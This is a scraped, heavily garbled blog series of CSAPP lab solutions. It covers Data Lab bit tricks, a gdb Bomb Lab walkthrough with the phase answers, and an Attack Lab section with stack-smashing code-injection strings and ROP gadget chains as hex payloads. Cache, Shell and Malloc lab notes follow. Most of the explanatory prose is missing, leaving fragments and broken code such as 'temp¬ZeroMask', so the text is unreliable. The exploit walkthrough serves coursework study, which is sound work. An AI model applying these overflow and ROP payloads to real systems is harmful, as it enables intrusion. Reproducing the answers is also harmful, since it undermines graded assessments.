【不周山之读厚 Csapp】i Data Lab (-V-) 小土刀
【不周山之读厚 Csapp】i Data Lab (-V-) 小土刀
0 1
16.06.12: isGreat
16.04.16:
-
-
-
-
-
-
-
-
-
I Data Lab -
II Bomb Lab - gdb
III Attack Lab -
IV Cache Lab -
V Shell Lab - shell
VI Malloc Lab -
VII Proxy Lab -
Datalab
allOddBits(x) 1 2 12
isAsciiDigit(x) x ASCII 3 15
conditional(x, y, z) C x? y:z 3 16
!x !
logicalNeg(x) 4 12
tmin() 1 4
isTmax(x) x 32 2 10
negate(x) -x 3 24
isLessOrEqual(x,y) x <= y? 3 24
x
howManyBits(x) 4 90
float_twice(uf) 2.0*f 4 30
float_f2i(uf) (int) f 4 30
float_i2f(x) (float) x 4 30
checker
!, 0, TMin
1. 0 255(0xFF)
2.
3. ! ~
1.
2.
3.
4.
5.
6.
7. int
8. int, unsigned
2’s complent 32
2. =
3. btest
4. BDD checker
thirdBits
return word with every third bit (starting from the LSB) set to 1
Desired output: 0100 1001 0010 0100 1001 0010 0100 1001
Step 1: 0000 0000 0000 0000 0000 0000 0100 1001 0x49
Step 2: 0000 0000 0000 0000 1001 0010 0000 0000 Shift << 9
Step 3: 0000 0000 0000 0000 1001 0010 0100 1001 Add 0x49
Step 4: 0100 1001 0010 0100 0000 0000 0000 0000 Shift << 18
Step 5: 0100 1001 0010 0100 1001 0010 0100 1001 Add result from step 3
int thirdBits(void) {
int a = 0x49;
int b = (a << 9);
int c = b + a;
return (c << 18) + c; // Steps 4 and 5
}
./dlc -e bits.c
-e
isTmin
10
Tmin 0
0 Tmin
// 0 x 0
int isTmin(int x) {
return !(x+x)&!!(x);
}
isNotEqual
: isNotEqual(5,5) = 0, isNotEqual(4,5) = 1
! ~ & ^ | + << >>
6
2
0 !!
bit boolean
anyOddBit
12
2
0xFF 24 | >>
10101010 & 0
int anyOddBit(int x) {
return !!((x | (x >> 8) | (x >> 16) | (x >> 24)) & 0xaa);
}
negate
return -x
negate(1) = -1.
! ~ & ^ | + << >>
5
2
1 2’s complement 1
int negate(int x) {
return ~x + 1;
}
conditional
same as x ? y : z
conditional(2,4,5) = 4
! ~ & ^ | + << >>
16
3
if
y z x (y op expr) | (z op expr) (op
expr )
~!x + 1 x 0 0xffffffff 0
int conditional(int x, int y, int z) {
/*
*if x!=0,mask=0x00000000,so y&~mask==y and z&mask==0
*if x==0,mask=0xffffffff,so y&~mask = y&0 =0; z&mask=z
*/
int mask= ~!x+1;
return (y & ~mask)|(z & mask);
}
subOK
subOK(0x80000000,0x80000000) = 1
subOK(0x80000000,0x70000000) = 0
! ~ & ^ | + << >>
20
3
x-y
x-y ~y+1+x
overflow
1. x y
2. x-y x
overflow x y
x-y x-y x
isGreater
24
3
1.
2.
bitParity
20
4
int bitParity(int x) {
/* XORing two numbers returns a number with same bit parity.
Keep shifting half of our number until reduced to 1 bit simple case.*/
x = ( x >> 16 ) ^ x;
x = ( x >> 8 ) ^ x;
x = ( x >> 4 ) ^ x;
x = ( x >> 2 ) ^ x;
x = ( x >> 1) ^ x;
return (x & 1);
}
howManyBits
howManyBits(12) = 5
howManyBits(298) = 10
howManyBits(-5) = 4
howManyBits(0) = 1
howManyBits(-1) = 1
howManyBits(0x80000000) = 32
! ~ & ^ | + << >>
90
@guojiex
int howManyBits(int x) {
int temp=x^(x>>31);//get positive of x;
int isZero=!temp;
//notZeroMask is 0xffffffff
int notZeroMask=(!(!temp)<<31)>>31;
int bit_16,bit_8,bit_4,bit_2,bit_1;
bit_16=!(!(temp>>16))<<4;
//see if the high 16bits have value,if have,then we need at least 16 bits
//if the highest 16 bits have value,then rightshift 16 to see the exact place of
//if not means they are all zero,right shift nothing and we should only consider the low
temp=temp>>bit_16;
bit_8=!(!(temp>>8))<<3;
temp=temp>>bit_8;
bit_4=!(!(temp>>4))<<2;
temp=temp>>bit_4;
bit_2=!(!(temp>>2))<<1;
temp=temp>>bit_2;
bit_1=!(!(temp>>1));
temp=bit_16+bit_8+bit_4+bit_2+bit_1+2;//at least we need one bit for 1 to tmax,
//and we need another bit for sign
return isZero|(temp¬ZeroMask);
}
float_half
Return bit-level equivalent of expression (float) x. Result is returned as unsigned int, but it is to be
IEEE
unsigned float_half(unsigned uf) {
int round, S, E, maskE, maskM, maskS,maskEM, maskSM, tmp;
round = !((uf&3)^3);
maskS = 0x80000000;
maskE = 0x7F800000;
maskM = 0x007FFFFF;
maskEM= 0x7FFFFFFF;
maskSM= 0x807FFFFF;
E = uf&maskE;
S = uf&maskS;
//Nan or Infinity
if (E==0x7F800000) return uf;
//E=1 - specialcase
if (E==0x00800000){
return S | (round + ((uf & maskEM)>>1)) ;
}
//E=0 - denormalized
if (E==0x00000000) {
tmp = (uf&maskM)>>1;
return S | (tmp + round);
}
//normalized case
return (((E>>23)-1)<<23) | (uf & maskSM);
}
float_i2f
Return bit-level equivalent of expression (float) x. Result is returned as unsigned int, but it is to be
interpreted as the bit-level representation of a single-precision floating point values.
Any integer/unsigned operations incl. ||, &&. also if, while
30
IEEE
@guojiex
unsigned float_i2f(int x) {
/*int exponent=0;
return ((sign<<31)|(exponent<<23)|fraction)+flag;*/
int sign=x>>31&1;
int i;
int exponent;
int fraction;
int delta;
int fraction_mask;
if(x==0)//||x==0x8000000)
return x;
else if(x==0x80000000)
exponent=158;
else{
if (sign)//turn negtive to positive
x = -x;
i = 30;
while ( !(x >> i) )//see how many bits do x have(rightshift until 0)
i--;
//printf("%x %d\n",x,i);
exponent = i + 127;
x = x << (31 - i);//clean all those zeroes of high bits
fraction_mask = 0x7fffff;//(1 << 23) - 1;
fraction = fraction_mask & (x >> 8);//right shift 8 bits to become the fraction,sign
x = x & 0xff;
delta = x > 128 || ((x == 128) && (fraction & 1));//if lowest 8 bits of x is larger t
fraction += delta;
if(fraction >> 23) {//if after rounding fraction is larger than 23bits
fraction &= fraction_mask;
exponent += 1;
}
}
return (sign<<31)|(exponent<<23)|fraction;
}
float_f2i
Return bit-level equivalent of expression (int) f for floating point argument f. Argument is passed
as unsigned int, but it is to be interpreted as the bit-level representation of a single-precision floating point
value. Anything out of range (including NaN and infinity) should return 0x80000000u.
IEEE
if (sign) {
// original number was negative, make the new number negative
frac = ~(frac) + 1;
}
return frac;
}
# CSAPP # # # Data
/ CSAPP CSAPP II Bomb Lab 0
-
-
-
-
-
-
-
-
-
I Data Lab -
II Bomb Lab - gdb
$ $-42 , $0x15213
% %esi , %rax
(%rbx) , 0x1c(%rax) ,
0x4(%rcx, %rdi,
0x1)
mov %rbx, %rdx rdx = rbx
test b, a a&b
Jump if above(unsigned
jmp Always jump ja
>)
Jump if below(unsigned
jne/jnz Jump if !eq / !zero jb
<)
#
# bomb
objdump -t bomb | less
#
# explode_bomb
objdump -d bomb > bomb.txt
#
strings bomb | less
GDB
gdb bomb
#
help
#
break explode_bomb
break phase_1
#
run
#
disas
#
info registers
#
print $rsp
#
stepi
#
x/4wd $rsp
ctl+c sscanf
/bomb
bomb.c
initialize_bomb_solve
explode_bomb
bomb_id
initialize_bomb
explode_bomb
0000000000400fb0 <phase_1>:
400fb0: 48 83 ec 08 sub $0x8,%rsp
400fb4: be f0 27 40 00 mov $0x4027f0,%esi
400fb9: e8 72 04 00 00 callq 401430 <strings_not_equal>
400fbe: 85 c0 test %eax,%eax
400fc0: 74 05 je 400fc7 <phase_1+0x17>
400fc2: e8 3d 07 00 00 callq 401704 <explode_bomb>
400fc7: 48 83 c4 08 add $0x8,%rsp
400fcb: c3 retq
%esi
test %eax 0 0
$0x4027f0
disas
info registers :
abc eax eax rax
mov x $esi
Bingo
gdb
phase_1 continue
phase_2 explode_bomb
phase_2
abcd
read_six_numbers
movslq %rdx
0000000000401010 <phase_3>:
401010: 48 83 ec 18 sub $0x18,%rsp
401014: 4c 8d 44 24 0c lea 0xc(%rsp),%r8
401019: 48 8d 4c 24 07 lea 0x7(%rsp),%rcx
40101e: 48 8d 54 24 08 lea 0x8(%rsp),%rdx
401023: be 4e 28 40 00 mov $0x40284e,%esi
401028: b8 00 00 00 00 mov $0x0,%eax
40102d: e8 7e fc ff ff callq 400cb0 <__isoc99_sscanf@plt>
// %eax sscanf 3
401032: 83 f8 02 cmp $0x2,%eax
401035: 7f 05 jg 40103c <phase_3+0x2c>
401037: e8 c8 06 00 00 callq 401704 <explode_bomb>
// 7
40103c: 83 7c 24 08 07 cmpl $0x7,0x8(%rsp)
401041: 0f 87 fc 00 00 00 ja 401143 <phase_3+0x133>
401047: 8b 44 24 08 mov 0x8(%rsp),%eax
// 0x402860 %rax
40104b: ff 24 c5 60 28 40 00 jmpq *0x402860(,%rax,8)
401052: b8 6e 00 00 00 mov $0x6e,%eax
401057: 81 7c 24 0c df 00 00 cmpl $0xdf,0xc(%rsp)
40105e: 00
40105f: 0f 84 e8 00 00 00 je 40114d <phase_3+0x13d>
401065: e8 9a 06 00 00 callq 401704 <explode_bomb>
40106a: b8 6e 00 00 00 mov $0x6e,%eax
40106f: e9 d9 00 00 00 jmpq 40114d <phase_3+0x13d>
401074: b8 6a 00 00 00 mov $0x6a,%eax
401079: 81 7c 24 0c 01 03 00 cmpl $0x301,0xc(%rsp)
401080: 00
401081: 0f 84 c6 00 00 00 je 40114d <phase_3+0x13d>
401087: e8 78 06 00 00 callq 401704 <explode_bomb>
40108c: b8 6a 00 00 00 mov $0x6a,%eax
401091: e9 b7 00 00 00 jmpq 40114d <phase_3+0x13d>
401096: b8 63 00 00 00 mov $0x63,%eax
40109b: 81 7c 24 0c 1d 01 00 cmpl $0x11d,0xc(%rsp)
4010a2: 00
4010a3: 0f 84 a4 00 00 00 je 40114d <phase_3+0x13d>
4010a9: e8 56 06 00 00 callq 401704 <explode_bomb>
4010ae: b8 63 00 00 00 mov $0x63,%eax
4010b3: e9 95 00 00 00 jmpq 40114d <phase_3+0x13d>
4010b8: b8 70 00 00 00 mov $0x70,%eax
4010bd: 81 7c 24 0c 16 02 00 cmpl $0x216,0xc(%rsp)
4010c4: 00
4010c5: 0f 84 82 00 00 00 je 40114d <phase_3+0x13d>
4010cb: e8 34 06 00 00 callq 401704 <explode_bomb>
4010d0: b8 70 00 00 00 mov $0x70,%eax
4010d5: eb 76 jmp 40114d <phase_3+0x13d>
4010d7: b8 77 00 00 00 mov $0x77,%eax
4010dc: 81 7c 24 0c cd 00 00 cmpl $0xcd,0xc(%rsp)
4010e3: 00
4010e4: 74 67 je 40114d <phase_3+0x13d>
4010e6: e8 19 06 00 00 callq 401704 <explode_bomb>
4010eb: b8 77 00 00 00 mov $0x77,%eax
4010f0: eb 5b jmp 40114d <phase_3+0x13d>
4010f2: b8 70 00 00 00 mov $0x70,%eax
4010f7: 81 7c 24 0c 9a 00 00 cmpl $0x9a,0xc(%rsp)
4010fe: 00
4010ff: 74 4c je 40114d <phase_3+0x13d>
401101: e8 fe 05 00 00 callq 401704 <explode_bomb>
401106: b8 70 00 00 00 mov $0x70,%eax
40110b: eb 40 jmp 40114d <phase_3+0x13d>
40110d: b8 74 00 00 00 mov $0x74,%eax
401112: 81 7c 24 0c 13 01 00 cmpl $0x113,0xc(%rsp)
401119: 00
40111a: 74 31 je 40114d <phase_3+0x13d>
40111c: e8 e3 05 00 00 callq 401704 <explode_bomb>
401121: b8 74 00 00 00 mov $0x74,%eax
401126: eb 25 jmp 40114d <phase_3+0x13d>
401128: b8 79 00 00 00 mov $0x79,%eax
40112d: 81 7c 24 0c 3b 01 00 cmpl $0x13b,0xc(%rsp)
401134: 00
401135: 74 16 je 40114d <phase_3+0x13d>
401137: e8 c8 05 00 00 callq 401704 <explode_bomb>
40113c: b8 79 00 00 00 mov $0x79,%eax
401141: eb 0a jmp 40114d <phase_3+0x13d>
401143: e8 bc 05 00 00 callq 401704 <explode_bomb>
401148: b8 63 00 00 00 mov $0x63,%eax
40114d: 3a 44 24 07 cmp 0x7(%rsp),%al
401151: 74 05 je 401158 <phase_3+0x148>
401153: e8 ac 05 00 00 callq 401704 <explode_bomb>
401158: 48 83 c4 18 add $0x18,%rsp
40115c: c3 retq
0x40284e
switch
0 mov 0xdf
223 0 +317
%al mov
0x6e 110 n
0 n 223
phase_4
func4
000000000040115d <func4>:
40115d: 41 54 push %r12
40115f: 55 push %rbp
401160: 53 push %rbx
401161: 89 fb mov %edi,%ebx
401163: 85 ff test %edi,%edi
401165: 7e 24 jle 40118b <func4+0x2e>
401167: 89 f5 mov %esi,%ebp
401169: 89 f0 mov %esi,%eax
40116b: 83 ff 01 cmp $0x1,%edi
40116e: 74 20 je 401190 <func4+0x33>
401170: 8d 7f ff lea -0x1(%rdi),%edi
401173: e8 e5 ff ff ff callq 40115d <func4>
401178: 44 8d 24 28 lea (%rax,%rbp,1),%r12d
40117c: 8d 7b fe lea -0x2(%rbx),%edi
40117f: 89 ee mov %ebp,%esi
0x402b56
2
1 1 4
2, 3, 4
%edi 9 2 2
1
2/3/4
264 3
6 +9
6 %edx %eax 0 %eax 5
+31 movslq 64
movzbl 32 0
0x34 52
52 16+16+10+6+2+2=52 5, 5, 1, 2, 0, 0
ASCII
eeabpp
Dump of assembler code for function phase_6:
=> 0x40122c <+0>: push %r12
0x40122e <+2>: push %rbp
0x40122f <+3>: push %rbx
0x401230 <+4>: sub $0x50,%rsp
0x401234 <+8>: mov %rsp,%rsi
0x401237 <+11>: callq 0x40173a <read_six_numbers>
0x40123c <+16>: mov $0x0,%ebp # ebp = 0
0x401241 <+21>: jmp 0x40127d <phase_6+81>
0x604300
struct {
int value;
int order;
node* next;
} node;
order
6 2 1 5 4 3
secret_phase phase_defused
%edi
0x402ba0
213rocks!
read_line strtol
fun7 5 fun7
0x604120
36
/ \
8 50
/ \ / \
/ \ / \
6 22 45 107
/ \ / \ / \ / \
1 7 20 35 40 47 99 1001
struct treeNode
{
int data;
struct treeNode* leftChild;
struct treeNode* rightChild;
};
5 47
# CSAPP # # # Bomb
Hexo | - NexT.Mist
& | 2
& | 2
! " # ☼ % & '
iOS
-
-
-
-
-
-
-
-
-
I Data Lab -
II Bomb Lab - gdb
ROP
x86-64
%rax
%rbx, %r12, %r13, %r14, %rbp, %rsp
%rip
x86-64 %rsp
(stack frame)
x86-64
x86-64
x86-64
objdump -d
gdb
gcc objdump
# foo.s
vim foo.s
# gcc foo.o
gcc -c foo.s
# objdump
objdump -d foo.o | less
#
./hex2raw -i inputfile -o outputfile
gadget farm.c
gadgets
gcc -c farm.c
objdump -d farm.o | less
c3 gadget
(little endian)
ctarget :
rtarget : ROP
cookie.txt : 8 16
farm.c : gadget
hex2raw :
BUFFER_SIZE
0x0a \n
hex2raw 2 16 0 00
0xdeadbeef ef be ad de little-endian
ctarget
void test() {
int val;
val = getbuf();
printf("NO explit. Getbuf returned 0x%x\n", val);
}
void touch1() {
vlevel = 1;
printf("Touch!: You called touch1()\n");
validate(1);
exit(0);
}
getbuf() touch1() test()
ctarget
touch1 ret
gdb getbuf
buf BUFFER_SIZE
scp [email protected]:~/513/target334/ctarget.txt
./
getbuf getbuf
000000000040181c <getbuf>:
40181c: 48 83 ec 28 sub $0x28,%rsp
401820: 48 89 e7 mov %rsp,%rdi
401823: e8 88 02 00 00 callq 401ab0 <Gets>
401828: b8 01 00 00 00 mov $0x1,%eax
40182d: 48 83 c4 28 add $0x28,%rsp
401831: c3 retq
401832: 90 nop
401833: 90 nop
touch1
0000000000401834 <touch1>:
401834: 48 83 ec 08 sub $0x8,%rsp
401838: c7 05 9a 3c 20 00 01 movl $0x1,0x203c9a(%rip) # 6054dc <vlevel>
0x401834 8 0x00401834
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
34 18 40 00
little endian
p1r.txt
ctarget touch2 C
( p2.s)
%rdi touch2
touch2
gcc -c p2.s
objdump -d p2.o > p2.byte
p2.byte
gdb
0x401828
%rsp 0x5560f2d8
48 c7 c7 ee
4f 37 45 68
60 18 40 00
c3 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
d8 f2 60 55
strncmp getbuf
cookie
0x45374fee -> 34 35 33 37 34 66 65 65
hexmatch
touch3 :
000000000040196e <touch3>:
40196e: 53 push %rbx
40196f: 48 89 fb mov %rdi,%rbx
401972: c7 05 60 3b 20 00 03 movl $0x3,0x203b60(%rip) # 6054dc <vlevel>
401979: 00 00 00
40197c: 48 89 fe mov %rdi,%rsi
40197f: 8b 3d 5f 3b 20 00 mov 0x203b5f(%rip),%edi # 6054e4 <cookie>
401985: e8 36 ff ff ff callq 4018c0 <hexmatch>
40198a: 85 c0 test %eax,%eax
0x401985 hexmatch
0x5560f300
0x5560f308 0x00401f94
0x5560f318
48 c7 c7 18 f3 60 55 68 6e 19 40 00 c3 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
34 35 33 37 34 66 65 65 d8 f2 60 55 00 00 00 00
09 00 00 00 00 00 00 00 94 1f 40 00 00 00 00 00
34 35 33 37 34 66 65 65
gcc -c p3.s
objdump -d p3.o > p3.byte
p3.byte
0000000000000000 <.text>:
0: 48 c7 c7 18 f3 60 55 mov $0x5560f318,%rdi
7: 68 6e 19 40 00 pushq $0x40196e
c: c3 retq
rtarget
retrun-oriented
programming(ROP) ret
return gadget gadget
gadget 0x400f18
( %rax - %rdi )
16
ret : 0xc3
nop : 0x90
[email protected]:~/513/target334/rtarget.txt ./
1. cookie %rdi
2. touch2
3. rtn
0000000000401a08 <start_farm>:
401a08: b8 01 00 00 00 mov $0x1,%eax
401a0d: c3 retq
0000000000401a0e <getval_440>:
401a0e: b8 48 88 c7 c3 mov $0xc3c78848,%eax
401a13: c3 retq
0000000000401a14 <addval_394>:
401a14: 8d 87 58 94 90 90 lea -0x6f6f6ba8(%rdi),%eax
401a1a: c3 retq
0000000000401a1b <addval_304>:
401a1b: 8d 87 66 58 90 c3 lea -0x3c6fa79a(%rdi),%eax
401a21: c3 retq
0000000000401a22 <addval_104>:
401a22: 8d 87 58 c3 50 83 lea -0x7caf3ca8(%rdi),%eax
401a28: c3 retq
0000000000401a29 <getval_341>:
401a29: b8 5b 48 89 c7 mov $0xc789485b,%eax
401a2e: c3 retq
0000000000401a2f <getval_278>:
401a2f: b8 41 48 89 c7 mov $0xc7894841,%eax
401a34: c3 retq
0000000000401a35 <setval_371>:
401a35: c7 07 49 89 c7 c3 movl $0xc3c78949,(%rdi)
401a3b: c3 retq
0000000000401a3c <getval_313>:
401a3c: b8 8c fa 58 c1 mov $0xc158fa8c,%eax
401a41: c3 retq
0000000000401a42 <mid_farm>:
401a42: b8 01 00 00 00 mov $0x1,%eax
401a47: c3 retq
popq 58 - 5f ROP
c3 addval_104 58 c3
%rax 0x401a24
c3 0x401a2b
ROP
0x00401860 ( touch2 )
-------
0x00401a2b ( %rax %rdi ) -> gadget 2
-------
0x45374fee ( cookie gadget 1 %rax )
-------
0x00401a24 ( ) -> gadget 1
-------
....
buf ( )
-------
little-endian
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
24 1a 40 00 ee 4f 37 45
2b 1a 40 00 60 18 40 00
64 0
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
24 1a 40 00 00 00 00 00
ee 4f 37 45 00 00 00 00
2b 1a 40 00 00 00 00 00
60 18 40 00 00 00 00 00
cookie ascii
%rdi touch3 movl
cookie ascii
0x45374fee -> 34 35 33 37 34 66 65 65
gadget
0000000000401a08 <start_farm>:
401a08: b8 01 00 00 00 mov $0x1,%eax
401a0d: c3 retq
0000000000401a0e <getval_440>:
401a0e: b8 48 88 c7 c3 mov $0xc3c78848,%eax
401a13: c3 retq
0000000000401a14 <addval_394>:
401a14: 8d 87 58 94 90 90 lea -0x6f6f6ba8(%rdi),%eax
401a1a: c3 retq
0000000000401a1b <addval_304>:
401a1b: 8d 87 66 58 90 c3 lea -0x3c6fa79a(%rdi),%eax
401a21: c3 retq
0000000000401a22 <addval_104>:
401a22: 8d 87 58 c3 50 83 lea -0x7caf3ca8(%rdi),%eax
401a28: c3 retq
0000000000401a29 <getval_341>:
401a29: b8 5b 48 89 c7 mov $0xc789485b,%eax
401a2e: c3 retq
0000000000401a2f <getval_278>:
401a2f: b8 41 48 89 c7 mov $0xc7894841,%eax
401a34: c3 retq
0000000000401a35 <setval_371>:
401a35: c7 07 49 89 c7 c3 movl $0xc3c78949,(%rdi)
401a3b: c3 retq
0000000000401a3c <getval_313>:
401a3c: b8 8c fa 58 c1 mov $0xc158fa8c,%eax
401a41: c3 retq
0000000000401a42 <mid_farm>:
401a42: b8 01 00 00 00 mov $0x1,%eax
401a47: c3 retq
0000000000401a48 <add_xy>:
401a48: 48 8d 04 37 lea (%rdi,%rsi,1),%rax
401a4c: c3 retq
0000000000401a4d <getval_349>:
401a4d: b8 89 c1 18 c0 mov $0xc018c189,%eax
401a52: c3 retq
0000000000401a53 <addval_166>:
401a53: 8d 87 48 89 e0 c3 lea -0x3c1f76b8(%rdi),%eax
401a59: c3 retq
0000000000401a5a <getval_106>:
401a5a: b8 89 ca 91 c3 mov $0xc391ca89,%eax
401a5f: c3 retq
0000000000401a60 <getval_330>:
401a60: b8 89 ca a4 db mov $0xdba4ca89,%eax
401a65: c3 retq
0000000000401a66 <addval_260>:
401a66: 8d 87 89 d6 38 c0 lea -0x3fc72977(%rdi),%eax
401a6c: c3 retq
0000000000401a6d <addval_114>:
401a6d: 8d 87 8d d6 90 90 lea -0x6f6f2973(%rdi),%eax
401a73: c3 retq
0000000000401a74 <setval_481>:
401a74: c7 07 8d c1 90 c3 movl $0xc390c18d,(%rdi)
401a7a: c3 retq
0000000000401a7b <setval_470>:
401a7b: c7 07 89 d6 92 90 movl $0x9092d689,(%rdi)
401a81: c3 retq
0000000000401a82 <getval_418>:
401a82: b8 8a 48 99 e0 mov $0xe099488a,%eax
401a87: c3 retq
0000000000401a88 <setval_253>:
401a88: c7 07 89 d6 08 c9 movl $0xc908d689,(%rdi)
401a8e: c3 retq
0000000000401a8f <setval_227>:
401a8f: c7 07 8b c1 20 db movl $0xdb20c18b,(%rdi)
401a95: c3 retq
0000000000401a96 <setval_110>:
401a96: c7 07 89 c1 20 c9 movl $0xc920c189,(%rdi)
401a9c: c3 retq
0000000000401a9d <setval_309>:
401a9d: c7 07 d8 4c 89 e0 movl $0xe0894cd8,(%rdi)
401aa3: c3 retq
0000000000401aa4 <getval_136>:
401aa4: b8 89 c1 91 c3 mov $0xc391c189,%eax
401aa9: c3 retq
0000000000401aaa <setval_319>:
401aaa: c7 07 89 d6 91 c3 movl $0xc391d689,(%rdi)
401ab0: c3 retq
0000000000401ab1 <addval_193>:
401ab1: 8d 87 a9 ca 90 c3 lea -0x3c6f3557(%rdi),%eax
401ab7: c3 retq
0000000000401ab8 <addval_471>:
401ab8: 8d 87 89 ca c4 c9 lea -0x363b3577(%rdi),%eax
401abe: c3 retq
0000000000401abf <setval_289>:
401abf: c7 07 89 ca 48 db movl $0xdb48ca89,(%rdi)
401ac5: c3 retq
0000000000401ac6 <addval_482>:
401ac6: 8d 87 89 ca 38 c0 lea -0x3fc73577(%rdi),%eax
401acc: c3 retq
0000000000401acd <addval_125>:
401acd: 8d 87 08 89 e0 c3 lea -0x3c1f76f8(%rdi),%eax
401ad3: c3 retq
0000000000401ad4 <getval_332>:
401ad4: b8 09 c1 90 c3 mov $0xc390c109,%eax
401ad9: c3 retq
0000000000401ada <addval_385>:
401ada: 8d 87 48 8b e0 90 lea -0x6f1f74b8(%rdi),%eax
401ae0: c3 retq
0000000000401ae1 <setval_263>:
401ae1: c7 07 4c 89 e0 90 movl $0x90e0894c,(%rdi)
401ae7: c3 retq
0000000000401ae8 <getval_187>:
401ae8: b8 4b 89 d6 c1 mov $0xc1d6894b,%eax
401aed: c3 retq
0000000000401aee <addval_462>:
401aee: 8d 87 89 ca c4 d2 lea -0x2d3b3577(%rdi),%eax
401af4: c3 retq
0000000000401af5 <getval_109>:
401af5: b8 c9 c1 90 c3 mov $0xc390c1c9,%eax
401afa: c3 retq
0000000000401afb <addval_238>:
401afb: 8d 87 89 d6 94 d2 lea -0x2d6b2977(%rdi),%eax
401b01: c3 retq
0000000000401b02 <setval_404>:
401b02: c7 07 a9 d6 20 d2 movl $0xd220d6a9,(%rdi)
401b08: c3 retq
0000000000401b09 <getval_469>:
401b09: b8 ad 89 ca 90 mov $0x90ca89ad,%eax
401b0e: c3 retq
0000000000401b0f <getval_291>:
401b0f: b8 03 48 89 e0 mov $0xe0894803,%eax
401b14: c3 retq
0000000000401b15 <addval_345>:
401b15: 8d 87 89 c1 84 d2 lea -0x2d7b3e77(%rdi),%eax
401b1b: c3 retq
0000000000401b1c <setval_424>:
401b1c: c7 07 c4 4c 89 e0 movl $0xe0894cc4,(%rdi)
401b22: c3 retq
( @yaoxiuh)
1. rsp
2. ( ) + (cookie stack ) pop
3. rdi
4. touch3
5. cookie stack
6. \0 00000000
%rdi
%rsp
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
11 1b 40 00 00 00 00 00
2b 1a 40 00 00 00 00 00
24 1a 40 00 00 00 00 00
48 00 00 00 00 00 00 00
98 1a 40 00 00 00 00 00
c8 1a 40 00 00 00 00 00
68 1a 40 00 00 00 00 00
48 1a 40 00 00 00 00 00
2b 1a 40 00 00 00 00 00
6e 19 40 00 00 00 00 00
34 35 33 37 34 66 65 65
00 00 00 00 00 00 00 00
./hex2raw < p5.txt > p5r.txt ./rtarget -i p5r.txt
ROP
%rsp
# CSAPP # # # Attack
Hexo | - NexT.Mist
& | 2
! " # ☼ % & '
-
-
-
-
-
-
-
I Data Lab -
II Bomb Lab - gdb
III Attack Lab -
IV Cache Lab -
V Shell Lab - shell
VI Malloc Lab -
VII Proxy Lab -
trace
u -1 u >
int_max 0
2
int main() {
int* a = malloc(100*sizeof(int));
for (int i=0; i < 100; i++) {
a[i] = i / a[i];
}
free(a);
return 0;
}
a main
int main() {
char w[strln("C programming")];
strcpy(w, "C programming");
printf("%s\n", w);
return 0;
}
strlen \0
struct ht_node {
int key;
int data;
};
typedef struct ht_node* node;
node
5
char *strcdup(int n, char c){
char dup[n+1];
int i;
for (i = 0; i < n; i++)
dup[i] = c;
dup[i] = '\0';
char *A = dup;
return A;
}
strcdup A
b1 0x104
b2 0x208
byte
80
GDB
gdbtui <binary>
layout split
valgrind
gcc -g
valgrind --leak-check=full
trace-mem=yes ls -l ls -l
[ ] , I
M +
S
L
64 16
valgrind trace hit, miss eviction
csim-ref
1.
2.
3. cache
4.
5.
typedef struct
{
int valid;
int tag;
int time_stamp;
} cache_line;
cache[S][E] S = 2s set
getopt() #include
man 3 getopt
trace fscanf
man fscanf
cache malloc
free
some_pointer_you_malloced = malloc(sizeof(int));
Free(some_pointer_you_malloced);
Free(some_pointer_you_malloced);
32 x 32
64 x 64
61 x 67
1KB
directly mapped E=1
64 x 64 miss
61 x 67
8 24 32 x 32 64 x 64
block 8 int 32 x 32
set 8x8
1 7
32 x 32 miss 300
64 x 64 miss 1300
5 1 8x8 4x
4 1300 4
4 conflict miss
12 4
-Werror warning
man <function-name>
locality
The memory hierarcy creates a large pool of storage that costs as much as the cheap storage near the bottom,
but that serves data to programs at the rate of the fast storage near the top.
# CSAPP # # # Cache
shell shell
-
-
-
-
-
-
-
-
-
I Data Lab -
II Bomb Lab - gdb
shell
Exceptional Control Flow
man pages
sigemptyset()
sigaddset()
sigprocmask()
sigsuspend()
waitpid()
open()
dup2()
setpgid()
kill()
tsh.c shell
tsh>
tsh>
name name
&
quit shell
jobs
JID
trace ./runtrace
#
./runtrace -h
#
./runtrace -f trace05.txt -s ./tsh
./sdriver
#
./sdriver -h
#
./sdriver
./sdriver
trace
Shell
shell
1. shell jobs
2. shell fork
/bin/ls -l -d
job
argc == 3
argv[0] == ''/bin/ls''
argv[1] == ''-l''
argv[2] == ''-d''
ctrl-z SIGTSTP
SIGCONT
jobs
bg job
bg job
fg job
I/O redirection
sleep()
while(1);
sigsuspend
waitpid
terminal group
WUNTRACED WNOHANG
man
kill -pid
addjob
exec
/bin/ps , /bin/echo
shell ctrl-c
SIGINT
tshref runtrace
tshref id runtrace
trace
eval
token
exit(0);
jobs listjobs
outfile
outfile
FG BG JID PID
sigsuspend
. -> -
> .
SIGCHLD 80/100
trace22.txt I/O
redirection(input)
eval handler
jobs
setpgid(0,0) execve
dups STDIN
flag
trace15.txt
csapp.h tsh.c
: man
man
tar zxvf manpages-zh-1.5.1.tar.gz
cd manpages-zh-1.5.1
./configure --prefix=/usr/local/zhman --disable-zhtw
make && make install
Mac groff
/etc/man.conf NROFF
Mac/Linux man
TLDR
# Shell # CSAPP # #
gdb debug
-
-
-
-
-
-
-
-
-
I Data Lab -
II Bomb Lab - gdb
mm.c
int mm_init(void);
void *malloc(size_t size);
void free(void *ptr);
void *realloc(void *ptr, size_t size);
void *calloc(size_t nmemb, size_t size);
void mm_checkheap(int);
mm-init
mem.init 0 -1
realloc
block
calloc nmemb size
mm_checkheap exit
mm_heapchecker(__Line__);
memlib.c
void *mem_heap_lo(void)
void *mem_heap_hi(void)
size_t mem_heapsize(void)
head checker
All next/previous pointer are consistent (is A’s next pointer points ot B, B’s previous pointer should
point to A)
Count free blocks by iterating through every block and traversing free list by pointers and see if they
match
All blocks in each list bucket fall within bucket size range(segregated list)
8-byte
explcit free list
64 8
sizeof(size_t) == 8
gprof
free block implicit free list, explicit free list, segregated free list
